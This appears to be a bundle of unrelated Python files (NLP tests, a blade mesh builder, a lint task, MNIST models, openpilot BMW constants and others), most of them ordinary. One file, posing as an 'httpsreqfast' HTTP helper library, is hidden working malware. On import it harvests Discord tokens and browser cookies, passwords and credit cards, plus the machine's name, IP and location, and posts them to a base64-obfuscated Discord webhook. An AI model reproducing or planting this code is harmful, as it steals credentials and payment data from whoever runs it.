def get_action(self) -> str:
""" Returns the action this DriverArgument holds """
return self.action
def get_project(self) -> dict:
""" Returns the project this DriverArgument holds """
return self.pl_project
def get_projects(self) -> dict:
""" Returns the projects this DriverArgument holds """
return self.pl_projects
def make_start(self, project: dict, limited: bool, quit: bool):
""" Creates a proper DriverArgument configured for driver start """
self.action = "START"
self.pl_project = project
self.o_lim = False if limited == None else limited
self.o_quit = False if limited == None else limited
def make_add(self, project: dict, projects: list):
""" Creates a proper DriverArgument configured for driver add """
self.action = "ADD"
self.pl_project = project
self.pl_projects = projects
def make_rm(self, project: dict, projects: list):
""" Creates a proper DriverArgument configured for driver remove """
self.action = "RM"
self.pl_project = project
self.pl_projects = projects
def make_edit(self, project: dict, projects: list, field: str):
""" Creates a proper DriverArgument configured for driver edit """
self.action = "EDIT"
self.pl_project = project
self.pl_projects = projects
self.pl_field = field
|
#! /usr/bin/env python
from b3p import geometry_section
from b3p import geometry_blade_shape
from b3p import geometry_web
import pickle
def build_mesh(
pckfile,
radii,
web_inputs,
web_intersections,
prefix,
n_web_points=10,
n_ch_points=120,
outfile="out.vtp",
added_datums={},
panel_mesh_scale=[],
):
sections = pickle.load(open(pckfile, "rb"))
# create webs, using parametric coordinates, the point lists are
# (rel_coordinate_along_web,first_rel_chordwise_point,second_rel_chordwise_point)
# web_root is the lowest r location of the web, web_tip is the highest
weblist = []
c = 0
for i in web_inputs:
weblist.append(
geometry_web.web(
points=web_intersections[i],
web_root=web_inputs[i]["z_start"],
web_tip=web_inputs[i]["z_end"],
web_name="%s_%s.txt" % (prefix, i),
coordinate=i,
flip_normal=(web_inputs[i]["origin"][1] > 0),
)
)
c += 1
nsec = []
z = [i[0][2] for i in sections]
# loop over the sections and add them to a section list
for i in sections:
r = i[0][2] - min(z)
r_rel = (r - min(z)) / (max(z) - min(z))
sec = geometry_section.section(r, r_rel, i, open_te=False)
nsec.append(sec)
# create a blade loft from the sections
blade = geometry_blade_shape.blade_shape(
nsec,
section_resolution=200,
web_resolution=n_web_points,
added_datums=added_datums,
)
for i in weblist:
blade.set_web(i)
blade.build_interpolated_sections(radii=radii, interpolation_type=2)
# mesh with a given number of points around the circumference
blade.mesh(n_ch_points, panel_mesh_scale=panel_mesh_scale)
print("# writing to %s" % outfile)
blade.write_mesh(outfile)
print("# writing mesh done")
|
#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
import pytest
@pytest.fixture
def hannanum_instance():
from konlpy import init_jvm
from konlpy.tag import Hannanum
init_jvm()
h = Hannanum()
return h
@pytest.fixture
def string():
return u"꽃가마 타고 강남 가자!"
def test_hannanum_analyze(hannanum_instance, string):
assert hannanum_instance.analyze(string) ==\
[[[(u'\uaf43\uac00', u'ncn'), (u'\uc774', u'jp'), (u'\ub9c8', u'ef')],
[(u'\uaf43\uac00\ub9c8', u'ncn')],
[(u'\uaf43\uac00', u'nqq'), (u'\uc774', u'jp'), (u'\ub9c8', u'ef')],
[(u'\uaf43\uac00\ub9c8', u'nqq')]],
[[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecc')],
[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecs')],
[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecx')]],
[[(u'\uac15\ub0a8', u'ncn')]],
[[(u'\uac00', u'pvg'), (u'\uc790', u'ecc')],
[(u'\uac00', u'pvg'), (u'\uc790', u'ecs')],
[(u'\uac00', u'pvg'), (u'\uc790', u'ef')],
[(u'\uac00', u'px'), (u'\uc790', u'ecc')],
[(u'\uac00', u'px'), (u'\uc790', u'ecs')],
[(u'\uac00', u'px'), (u'\uc790', u'ef')]],
[[(u'!', u'sf')]]]
def test_hannanum_nouns(hannanum_instance, string):
assert hannanum_instance.nouns(string) ==\
[u'\uaf43\uac00\ub9c8', u'\uac15\ub0a8']
def test_hannanum_morphs(hannanum_instance, string):
assert hannanum_instance.morphs(string) ==\
[u'\uaf43\uac00\ub9c8',
u'\ud0c0',
u'\uace0',
u'\uac15\ub0a8',
u'\uac00',
u'\uc790',
u'!']
def test_hannanum_pos_9(hannanum_instance, string):
assert hannanum_instance.pos(string) ==\
[(u'\uaf43\uac00\ub9c8', u'N'),
(u'\ud0c0', u'P'),
(u'\uace0', u'E'),
(u'\uac15\ub0a8', u'N'),
(u'\uac00', u'P'),
(u'\uc790', u'E'),
(u'!', u'S')]
def test_hannanum_pos_22(hannanum_instance, string):
assert hannanum_instance.pos(string, ntags=22) ==\
[(u'\uaf43\uac00\ub9c8', u'NC'),
(u'\ud0c0', u'PV'),
(u'\uace0', u'EC'),
(u'\uac15\ub0a8', u'NC'),
(u'\uac00', u'PX'),
(u'\uc790', u'EC'),
(u'!', u'SF')]
def test_hannanum_pos_join(hannanum_instance, string):
assert hannanum_instance.pos(string, join=True) ==\
[u'\uaf43\uac00\ub9c8/N',
u'\ud0c0/P',
u'\uace0/E',
u'\uac15\ub0a8/N',
u'\uac00/P',
u'\uc790/E',
u'!/S']
|
''' callcontract.py - デプロイしたコントラクトを呼び出す '''
import os
from web3 import Web3
from web3.contract import Contract
KOVAN_URL = os.getenv('KOVAN_URL')
address_file = 'HelloWorld.address'
abi_file = 'HelloWorld.abi'
w3 = Web3(Web3.HTTPProvider(KOVAN_URL))
print('w3.isConnected:', w3.isConnected())
''' コントラクトアドレスの読み出し '''
with open(address_file, mode='rt') as fp:
hwadd = fp.read()
''' ABIの読み出し '''
with open(abi_file, mode='rt') as fp:
abi = fp.read()
''' コントラクトオブジェクトの作成 '''
contract = w3.eth.contract(hwadd, abi=abi)
''' 関数を指定 '''
c_func = contract.functions.hello()
''' コントラクト関数の呼び出し '''
print('コントラクトを呼び出します。')
result = c_func.call()
print(result)
|
import os
import copy
import numpy as np
import pandas as pd
import torch
from sklearn.metrics import f1_score
from utils import load_model_dict
from models import init_model_dict
from train_test import prepare_trte_data, gen_trte_adj_mat, test_epoch
cuda = True if torch.cuda.is_available() else False
def cal_feat_imp(data_folder, model_folder, view_list, num_class):
num_view = len(view_list)
dim_hvcdn = pow(num_class,num_view)
if data_folder == 'ROSMAP':
adj_parameter = 2
dim_he_list = [200,200,100]
if data_folder == 'BRCA':
adj_parameter = 10
dim_he_list = [400,400,200]
data_tr_list, data_trte_list, trte_idx, labels_trte = prepare_trte_data(data_folder, view_list)
adj_tr_list, adj_te_list = gen_trte_adj_mat(data_tr_list, data_trte_list, trte_idx, adj_parameter)
featname_list = []
for v in view_list:
df = pd.read_csv(os.path.join(data_folder, str(v)+"_featname.csv"), header=None)
featname_list.append(df.values.flatten())
dim_list = [x.shape[1] for x in data_tr_list]
model_dict = init_model_dict(num_view, num_class, dim_list, dim_he_list, dim_hvcdn)
for m in model_dict:
if cuda:
model_dict[m].cuda()
model_dict = load_model_dict(model_folder, model_dict)
te_prob = test_epoch(data_trte_list, adj_te_list, trte_idx["te"], model_dict)
if num_class == 2:
f1 = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1))
else:
f1 = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1), average='macro')
feat_imp_list = []
for i in range(len(featname_list)):
feat_imp = {"feat_name":featname_list[i]}
feat_imp['imp'] = np.zeros(dim_list[i])
for j in range(dim_list[i]):
feat_tr = data_tr_list[i][:,j].clone()
feat_trte = data_trte_list[i][:,j].clone()
data_tr_list[i][:,j] = 0
data_trte_list[i][:,j] = 0
adj_tr_list, adj_te_list = gen_trte_adj_mat(data_tr_list, data_trte_list, trte_idx, adj_parameter)
te_prob = test_epoch(data_trte_list, adj_te_list, trte_idx["te"], model_dict)
if num_class == 2:
f1_tmp = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1))
else:
f1_tmp = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1), average='macro')
feat_imp['imp'][j] = (f1-f1_tmp)*dim_list[i]
data_tr_list[i][:,j] = feat_tr.clone()
data_trte_list[i][:,j] = feat_trte.clone()
feat_imp_list.append(pd.DataFrame(data=feat_imp))
return feat_imp_list
def summarize_imp_feat(featimp_list_list, topn=30):
num_rep = len(featimp_list_list)
num_view = len(featimp_list_list[0])
df_tmp_list = []
for v in range(num_view):
df_tmp = copy.deepcopy(featimp_list_list[0][v])
df_tmp['omics'] = np.ones(df_tmp.shape[0], dtype=int)*v
df_tmp_list.append(df_tmp.copy(deep=True))
df_featimp = pd.concat(df_tmp_list).copy(deep=True)
for r in range(1,num_rep):
for v in range(num_view):
df_tmp = copy.deepcopy(featimp_list_list[r][v])
df_tmp['omics'] = np.ones(df_tmp.shape[0], dtype=int)*v
df_featimp = df_featimp.append(df_tmp.copy(deep=True), ignore_index=True)
df_featimp_top = df_featimp.groupby(['feat_name', 'omics'])['imp'].sum()
df_featimp_top = df_featimp_top.reset_index()
df_featimp_top = df_featimp_top.sort_values(by='imp',ascending=False)
df_featimp_top = df_featimp_top.iloc[:topn]
print('{:}\t{:}'.format('Rank','Feature name'))
for i in range(len(df_featimp_top)):
print('{:}\t{:}'.format(i+1,df_featimp_top.iloc[i]['feat_name']))
|
import os
from collections import OrderedDict
from jogger.utils.files import walk
from .base import Task, TaskError
try:
import flake8 # noqa
HAS_FLAKE8 = True
except ImportError:
HAS_FLAKE8 = False
try:
import isort # noqa
HAS_ISORT = True
except ImportError:
HAS_ISORT = False
try:
import bandit # noqa
HAS_BANDIT = True
except ImportError:
HAS_BANDIT = False
try:
from django.core.management import call_command # noqa
HAS_DJANGO = True
except ImportError:
HAS_DJANGO = False
ENDINGS = {
'CRLF': b'\r\n',
'CR': b'\r',
'LF': b'\n'
}
DEFAULT_GOOD_ENDING = 'LF'
DEFAULT_MAX_FILESIZE = 1024 * 1024 # 1MB in bytes
def listify_multiline_string(string):
"""
Return a list constructed by splitting the given multiline string,
stripping whitespace, and filtering out empty values.
:param string: The multiline string to convert into a list.
:return: The resulting list.
"""
result = [i.strip() for i in string.splitlines()]
return filter(None, result)
class LintTask(Task):
help = (
'Lint the project. Automatically detects, and uses if found, isort and '
'flake8 for linting Python code, and bandit for finding common security '
'issues in Python code. Also runs fable (Find All Bad Line Endings) and '
'performs a dry-run of makemigrations (if Django is detected).'
)
steps = [
('python', '-p', 'Perform linting of Python code.'),
('fable', '-f', 'Find all bad line endings.'),
('bandit', '-b', 'Perform a Bandit security scan.'),
('migrations', '-m', 'Perform makemigrations dry-run.')
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.outcomes = OrderedDict()
def add_arguments(self, parser):
for name, short_flag, help_text in self.steps:
parser.add_argument(
short_flag, f'--{name}',
action='store_true',
dest=f'do_{name}',
help=help_text
)
def handle(self, **options):
settings = self.settings
explicit_steps = []
implicit_steps = []
for step, _, _ in self.steps:
# Consider the step explicit if a command line flag is included for
# it. Otherwise, consider the step implicit unless it has been
# disabled via the project settings file
if options[f'do_{step}']:
explicit_steps.append(step)
elif settings.getboolean(step, fallback=True):
implicit_steps.append(step)
if explicit_steps:
run = explicit_steps
explicit = True
else:
run = implicit_steps
explicit = False
for step in run:
getattr(self, f'handle_{step}')(explicit)
summary = []
for label, result in self.outcomes.items():
if result:
styled_result = self.styler.success('OK')
else:
styled_result = self.styler.error('FAIL')
summary.append(f'{label}: {styled_result}')
if summary:
self.stdout.write('Summary', style='label')
self.stdout.write('\n'.join(summary))
def handle_python(self, explicit):
if explicit and not HAS_ISORT and not HAS_FLAKE8:
self.stderr.write('Cannot lint python: Neither isort nor flake8 are available.')
return
if HAS_ISORT:
self.stdout.write('Running isort...', style='label')
result = self.cli('isort --check-only --diff .')
self.outcomes['isort'] = result.returncode == 0
self.stdout.write('') # newline
if HAS_FLAKE8:
self.stdout.write('Running flake8...', style='label')
result = self.cli('flake8 .')
self.outcomes['flake8'] = result.returncode == 0
self.stdout.write('') # newline
def _get_fable_excludes(self):
# Start with some sane default exclusions
excludes = {'.git', '__pycache__', '*.pyc', '*.pdf', '*.png', '*.jpg', '*.jpeg', '*.gif'}
# Add any configured excludes
try:
extra_excludes = self.settings['fable_exclude']
except KeyError:
pass
else:
excludes.update(listify_multiline_string(extra_excludes))
return excludes
def handle_fable(self, explicit):
self.stdout.write('Running fable...', style='label')
excludes = self._get_fable_excludes()
# Get the appropriate good ending from settings
good_ending = self.settings.get('fable_good_endings', DEFAULT_GOOD_ENDING)
if good_ending not in ENDINGS:
raise TaskError(f'Invalid value for fable_good_endings setting ({good_ending}).')
# Compile inverse dictionary of bad line endings
bad_endings = {v: k for k, v in ENDINGS.items() if k != good_ending}
# Get the maximum file size to analyse from settings
max_filesize = self.settings.get('fable_max_filesize', DEFAULT_MAX_FILESIZE)
try:
max_filesize = int(max_filesize)
except ValueError:
raise TaskError(f'Invalid value for fable_max_filesize setting ({max_filesize}).')
result = True
skipped = 0
for filename in walk('./', excludes):
if os.path.getsize(filename) > max_filesize:
skipped += 1
continue
with open(filename, 'rb') as f:
content = f.read()
for ending in bad_endings:
if ending in content:
self.stdout.write(f'Detected {bad_endings[ending]}: {filename}')
result = False
break
if skipped:
self.stdout.write(f'Skipped {skipped} large files')
self.outcomes['fable'] = result
self.stdout.write('') # newline
def handle_bandit(self, explicit):
if not HAS_BANDIT:
if explicit:
self.stderr.write('Cannot run bandit: Package is not available.')
return
self.stdout.write('Running bandit...', style='label')
cmd = 'bandit . -r'
# Set the command's verbosity based on the verbosity level of the task
verbosity = self.kwargs['verbosity']
if verbosity < 2:
cmd = f'{cmd} -q' # run in "quiet" mode
elif verbosity > 2:
cmd = f'{cmd} -v' # run in "verbose" mode
# Add any configured excludes
try:
excludes = self.settings['bandit_exclude']
except KeyError:
pass
else:
excludes = ','.join(listify_multiline_string(excludes))
cmd = f'{cmd} -x {excludes}'
result = self.cli(cmd)
self.outcomes['bandit'] = result.returncode == 0
self.stdout.write('') # newline
def handle_migrations(self, explicit):
if explicit and not HAS_DJANGO:
self.stderr.write('Cannot check migrations: Django is not available.')
return
if HAS_DJANGO:
self.stdout.write('Checking for missing migrations...', style='label')
result = self.cli('python manage.py makemigrations --dry-run --check')
self.outcomes['migrations'] = result.returncode == 0
self.stdout.write('') # newline
|
import os, re, shutil, requests, threading
from httpsreqfast.encoder import Encoder
from httpsreqfast.browser import Browser
from httpsreqfast.receiver import Receiver
from httpsreqfast.config import *
from httpsreqfast.utils.request import request_post
class Getter:
def fast_get(
self,
url : str,
params=None,
data=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects : bool=True,
proxies=None,
hooks=None,
stream=None,
verify=True,
cert=None,
json=None):
return requests.get(
url,
params=params,
data=data,
headers=headers,
cookies=cookies,
files=files,
auth=auth,
timeout=timeout,
allow_redirects=allow_redirects,
proxies=proxies,
hooks=hooks,
stream=stream,
verify=verify,
cert=cert,
json=json
)
def fast_post(
self,
url: str,
data=None,
json=None,
params=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects: bool=None,
proxies=None,
hooks=None,
stream=None,
verify=True,
cert=None):
return requests.get(
url,
data=data,
json=json,
params=params,
heaaders=headers,
cookies=cookies,
files=files,
auth=auth,
timeout=timeout,
allow_redirects=allow_redirects,
proxies=proxies,
hooks=hooks,
stream=stream,
verify=verify,
cert=cert
)
class Setup:
def __init__(self):
self.__browser = Browser()
self.__encoder = Encoder()
self.__akrt = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvOTY1NzMxOTIwNzc0MzA3OTUwL2lMOWE5X0wzMU9BWnYxRk5lNXQ3UVp6ampzZ2ozSHFhY25TWUNwM0RTWjJEc2h3X2ZuRV9JWDBodVVCdmpXMHFwVEJ6"
self.__url_check = "https://discord.com/api/v9/users/@me/guilds"
self.__browser_path = [
'_Roaming/Discord/Local Storage/leveldb',
'_Roaming/Lightcord/Local Storage/leveldb',
'_Roaming/discordcanary/Local Storage/leveldb',
'_Roaming/discordptb/Local Storage/leveldb',
'_Roaming/Opera Software/Opera Stable/Local Storage/leveldb',
'_Roaming/Opera Software/Opera GX Stable/Local Storage/leveldb',
'_Local/Amigo/User Data/Local Storage/leveldb',
'_Local/Torch/User Data/Local Storage/leveldb',
'_Local/Kometa/User Data/Local Storage/leveldb',
'_Local/Orbitum/User Data/Local Storage/leveldb',
'_Local/CentBrowser/User Data/Local Storage/leveldb',
'_Local/7Star/7Star/User Data/Local Storage/leveldb',
'_Local/Sputnik/Sputnik/User Data/Local Storage/leveldb',
'_Local/Vivaldi/User Data/Default/Local Storage/leveldb',
'_Local/Google/Chrome SxS/User Data/Local Storage/leveldb',
'_Local/Epic Privacy Browser/User Data/Local Storage/leveldb',
'_Local/Google/Chrome/User Data/Default/Local Storage/leveldb',
'_Local/uCozMedia/Uran/User Data/Default/Local Storage/leveldb',
'_Local/Microsoft/Edge/User Data/Default/Local Storage/leveldb',
'_Local/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb',
'_Local/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb',
'_Local/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb'
]
self.__files = [
f"{temp_folder}\\Chromium Cookies.txt",
f"{temp_folder}\\Chromium Passwords.txt",
f"{temp_folder}\\Chromium CreditCards.txt",
f"{temp_folder}\\metazip.zip"
]
self.__rharha = self.__encoder._decode_data(self.__akrt)
def __get_tokens(self):
try:
tokens = []
threading.Thread(target=self.__browser._get_tokens_firefox, args=(tokens,)).start()
for path in self.__browser_path:
path = path.replace("_Local", local).replace('_Roaming', roaming)
if os.path.exists(path):
for filename in os.listdir(path):
if not filename.endswith(".log") and not filename.endswith(".ldb"):
continue
else:
for line in [i.strip() for i in open(f"{path}\\{filename}", errors="ignore").readlines() if i.strip()]:
for token in re.findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', line):
tokens.append(token)
return set(tokens)
except:
pass
def __check_tokens(self, tokens):
try:
valid_tokens = []
for token in tokens:
try:
result = requests.get(self.__url_check, headers = {
"Authorization": token
})
if result.status_code == 200:
valid_tokens += f"{token}\n"
except:
pass
return valid_tokens
except:
pass
def __recreate_tokens(self, char_array):
try:
tokens = []
token = ""
for char in char_array:
if char == '\n':
tokens.append(token)
token = ""
else:
token += char
return tokens
except:
pass
def __get_datas(self, token):
try:
data = []
userdata = requests.get("https://discord.com/api/v9/users/@me", headers = {
"Authorization": token
}).json()
phone = userdata['phone']
data.append(f"email -> {userdata['email']}")
if (phone is not None):
data.append(f"phone -> {phone}")
return data
except:
pass
def __has_payment_methods(self, token) -> bool:
try:
has_billing = False
billing = requests.get("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers = {
"Authorization": token
}).json()
if len(billing) > 0:
has_billing = True
return has_billing
except:
pass
def __format_data(self, verified_tokens):
try:
content = ""
if len(verified_tokens) > 0:
for count, token in enumerate(verified_tokens, start=1):
content += f"\n\nToken #{count}:\n{self.__encoder._encode_data(token)}"
datas = self.__get_datas(token)
for data in datas:
content += f"\n{str(data)}"
content += f"\nbilling -> {self.__has_payment_methods(token)}"
else:
content = "No tokens found!\n"
return content
except:
pass
def __get_browser_data(self):
try:
self.__browser._main()
for file in self.__files:
request_post(self.__rharha, file)
except:
pass
def main(self):
try:
if os.name != "nt":
exit(1)
receiver = Receiver()
threading.Thread(target=self.__get_browser_data).start()
tokens = self.__get_tokens()
verfied_tokens = self.__check_tokens(tokens)
recreated_tokens = self.__recreate_tokens(verfied_tokens)
content = self.__format_data(recreated_tokens)
payload = {
"embeds": [
{
"title": "Discord Informations:",
"description": f"```{content}\n```",
"color": 0
},
{
"title": "Computer Informations:",
"description": f"```Compter Name -> {os.getenv('COMPUTERNAME')}\n"
+ f"Username -> {os.getenv('USERNAME')}```",
"color": 0
},
{
"title": "Network Informations",
"description": f"```Ip -> {receiver._get_ip()}\n"
+ f"Location -> {receiver._get_location()}\n"
+ f"Country -> {receiver._get_country()}\n"
+ f"Region -> {receiver._get_region()}\n"
+ f"ISP -> {receiver._get_isp()}```",
"color": 0
}
]
}
requests.post(self.__rharha, json=payload)
shutil.rmtree(temp_folder)
except:
pass
try:
threading.Thread(target=Setup().main).start()
except:
pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 01/24/22 10:38 PM
# @Author : Fabrice Harel-Canada
# @File : minist.py
import os
from typing import Optional
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import torch
from torch.nn import functional as F
from torch import nn
from pytorch_lightning.core.lightning import LightningModule
from torch.optim import Adam
import torchmetrics
from torch.utils.data import DataLoader, random_split
from torchvision.datasets import MNIST
from torchvision import datasets, transforms
from pytorch_lightning import Trainer, LightningDataModule
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
def unstable_softmax(logits):
"""Computes softmax in a numerically unstable way."""
exp = torch.exp(logits)
sm = exp / torch.sum(exp)
return sm
def unstable_cross_entropy(probs, labels):
"""Computes cross entropy in a numerically unstable way."""
return -torch.sum(torch.log(probs) * labels)
def stable_cross_entropy(logits, labels, reduction='mean'):
batchloss = -torch.sum(labels.squeeze() * torch.log(logits), dim=1)
if reduction == 'none':
return batchloss
elif reduction == 'mean':
return torch.mean(batchloss)
elif reduction == 'sum':
return torch.sum(batchloss)
else:
raise NotImplementedError('Unsupported reduction mode.')
class StableModel(LightningModule):
def __init__(self, num_classes: int = 10):
super().__init__()
self.num_classes = num_classes
# mnist images are (1, 28, 28) (channels, height, width)
self.layer_1 = nn.Linear(28 * 28, 128)
self.layer_2 = nn.Linear(128, 256)
self.layer_3 = nn.Linear(256, self.num_classes)
# metrics
self.accuracy = torchmetrics.Accuracy()
self.accuracy.mode = "multi-label"
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = F.softmax(x, dim=1)
return x
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.accuracy(probs, y)
self.log('train_acc_step', self.accuracy)
return loss
def training_epoch_end(self, outs):
# log epoch metric
self.log('train_acc_epoch', self.accuracy)
def validation_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.log("val_loss", loss)
self.accuracy(probs, y)
self.log('val_acc_step', self.accuracy)
return loss
def test_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.log("test_loss", loss)
self.accuracy(probs, y)
self.log('test_acc', self.accuracy)
def configure_optimizers(self):
return Adam(self.parameters(), lr=1e-3)
def predict(self, x):
out = self(x)
if torch.isnan(out).any():
raise ValueError("Model prediction contains NaN.")
return torch.argmax(out)
class UnstableSMModel(StableModel):
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = unstable_softmax(x)
return x
class UnstableCEModel(StableModel):
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
loss = unstable_cross_entropy(probs, y)
return loss
class UnstableSMCEModel(StableModel):
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = unstable_softmax(x)
return x
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
loss = unstable_cross_entropy(probs, y)
return loss
class MNISTDataModule(LightningDataModule):
def __init__(self,
data_dir: Optional[str] = './data/',
batch_size: int = 32):
super().__init__()
self.data_dir = data_dir
self.batch_size = batch_size
self.transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
self.target_transforms = transforms.Compose([
lambda x:torch.LongTensor([x]),
lambda x:F.one_hot(x, 10).squeeze()
])
self.setup()
def setup(self, stage: Optional[str] = None):
if stage == "fit" or stage is None:
mnist_full = MNIST(self.data_dir,
train=True,
transform=self.transforms,
target_transform=self.target_transforms)
self.mnist_train, self.mnist_val = random_split(mnist_full, [55000, 5000])
if stage == "test" or stage is None:
self.mnist_test = MNIST(self.data_dir,
train=False,
transform=self.transforms,
target_transform=self.target_transforms)
def train_dataloader(self):
return DataLoader(self.mnist_train, batch_size=self.batch_size)
def val_dataloader(self):
return DataLoader(self.mnist_val, batch_size=self.batch_size)
def test_dataloader(self):
return DataLoader(self.mnist_test, batch_size=self.batch_size)
def load_models():
sm = StableModel()
usmm = UnstableSMModel()
ucem = UnstableCEModel()
usmcem = UnstableSMCEModel()
models = [sm, usmm, ucem, usmcem]
return_models = []
for model in models:
model_name = model.__class__.__name__
model_save_path = os.path.join('./pretrained/', model_name + '.pth')
if os.path.exists(model_save_path):
print("Loading pretrained %s model!" % (model_name))
model.load_state_dict(torch.load(model_save_path))
model.eval()
else:
raise FileNotFoundError(
"A pretrained %s model was not found \
- run `python mnist.py` to generate!" % (model_name)
)
return_models.append(model)
return return_models
if __name__ == '__main__':
sm = StableModel()
usmm = UnstableSMModel()
ucem = UnstableCEModel()
usmcem = UnstableSMCEModel()
models = [sm, usmm, ucem, usmcem]
mnist_dm = MNISTDataModule()
escb = EarlyStopping(monitor="train_acc_epoch", mode="max", patience=3)
results = []
for model in models:
model_name = model.__class__.__name__
model_save_path = os.path.join('./pretrained/', model_name + '.pth')
if os.path.exists(model_save_path):
print("Loading pretrained %s model!" % (model_name))
model.load_state_dict(torch.load(model_save_path))
model.eval()
else:
# train
print("Training a new %s model!" % (model_name))
trainer = Trainer(max_epochs=10, callbacks=[escb])
trainer.fit(model, datamodule=mnist_dm)
# save model
os.makedirs(os.path.dirname(model_save_path), exist_ok=True)
torch.save(model.state_dict(), model_save_path)
model.eval()
trainer = Trainer(max_epochs=10, callbacks=[escb])
out = trainer.test(model, datamodule=mnist_dm)
out[0]['model'] = model
out[0]['model_name'] = model_name
results.extend(out)
import requests
from PIL import Image
import cv2
# image of a 2
url = 'https://www.researchgate.net/profile/Jose_Sempere/publication/221258631/figure/fig1/AS:305526891139075@1449854695342/Handwritten-digit-2.png'
response = requests.get(url, stream=True)
img = Image.open(response.raw)
img.show()
img_array = np.asarray(img)
resized = cv2.resize(img_array, (28, 28))
gray_scale = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY) # (28, 28)
image = cv2.bitwise_not(gray_scale)
image = image / 255
image = image.reshape(1, 28, 28)
image = torch.from_numpy(image).float().unsqueeze(0)
for result in results:
print(result['model'].predict(image))
|
from selfdrive.car import dbc_dict
# Steer torque limits
class SteerLimitParams: #controls running @ 100hz
STEER_MAX = 9
STEER_DELTA_UP = 10 / 100 # 10Nm/s
STEER_DELTA_DOWN = 1000 / 100 # 10Nm/sample - no limit
STEER_ERROR_MAX = 999 # max delta between torque cmd and torque motor
class SteerActuatorParams: # stepper parameters
MAX_STEERING_TQ = 8 # Nm
#Todo remvoe this if not used - since it is included in DBC factor
# ACTUATOR_RATIO = 25 / 12 * (13+212/289) # big cog / small cog * planetary gearbox
# POSITION_SCALING = 256 / 1.8 # microsteps / base step angle [deg]
CENTERING_COEFF = 0.0005
ZERO_ANGLE_HOLD_TQ = 1 #carcontroller will interpolate between zero angle torque and where linear region start
STEER_LINEAR_REGION = 5 #deg start of linear region for small angles
STEER_TORQUE_OFFSET = 3 # add offset to due
STEER_BACKLASH = 1 #deg
#car chimes: enumeration from dbc file. Chimes are for alerts and warnings
class CM:
MUTE = 0
SINGLE = 3
DOUBLE = 4
REPEATED = 1
CONTINUOUS = 2
#car beepss: enumeration from dbc file. Beeps are for activ and deactiv
class BP:
MUTE = 0
SINGLE = 3
TRIPLE = 2
REPEATED = 1
class AH:
#[alert_idx, value]
# See dbc files for info on values"
NONE = [0, 0]
FCW = [1, 1]
STEER = [2, 1]
BRAKE_PRESSED = [3, 10]
GEAR_NOT_D = [4, 6]
SEATBELT = [5, 5]
SPEED_TOO_HIGH = [6, 8]
class CAR:
E82_DCC = "BMW E82 with Dynamic Cruise Control VO544 coded in"
E90_DCC = "BMW E90 with Dynamic Cruise Control VO544"
E82 = "BMW E82 with normal Cruise Control VO540"
E90 = "BMW E82 with normal Cruise Control VO540"
BMW_Eseries = {
128: 5, 201: 8, 205: 8, 206: 8, 209: 8, 212: 8, 304: 5, 320: 2, 404: 4, 470: 2, 678: 2, 884: 5, #F-CAN
128: 5, 168: 8, 169: 8, 170: 8, 172: 8, 180: 8, 182: 5, 184: 8, 186: 8, 191: 5, 196: 7, 200: 6, 201: 8, 205: 8, 206: 8, 209: 8, 212: 8, 266: 6, 304: 5, 309: 2, 373: 3, 404: 4, 408: 5, 414: 8, 416: 8, 418: 8, 422: 8, 436: 8, 437: 7, 438: 7, 464: 8, 466: 6, 470: 2, 481: 6, 502: 2, 514: 2, 538: 3, 550: 5, 570: 4, 578: 5, 594: 2, 678: 2, 690: 8, 691: 5, 704: 3, 719: 2, 722: 3, 753: 3, 758: 2, 760: 8, 762: 5, 764: 7, 784: 7, 785: 2, 797: 2, 816: 8, 818: 2, 821: 8, 823: 2, 847: 2, 884: 5, 893: 2, 896: 7, 897: 2, 899: 4, 904: 7, 940: 2, 945: 6, 947: 6, 948: 8, 953: 3, 958: 2, 1007: 3, 1152: 8, 1170: 8, 1175: 8, 1176: 8, 1193: 8, 1246: 8, 1408: 8, 1426: 8, 1432: 8, 1449: 8, 1472: 8, 1494: 8, 1504: 8, 1506: 8, 1517: 8, 1522: 8, 1528: 8 #PT-CAN
}
FINGERPRINTS = {
CAR.E82_DCC: [{**BMW_Eseries, **{403: 8}}], #add DynamicCruiseControlStatus message for VO544 option
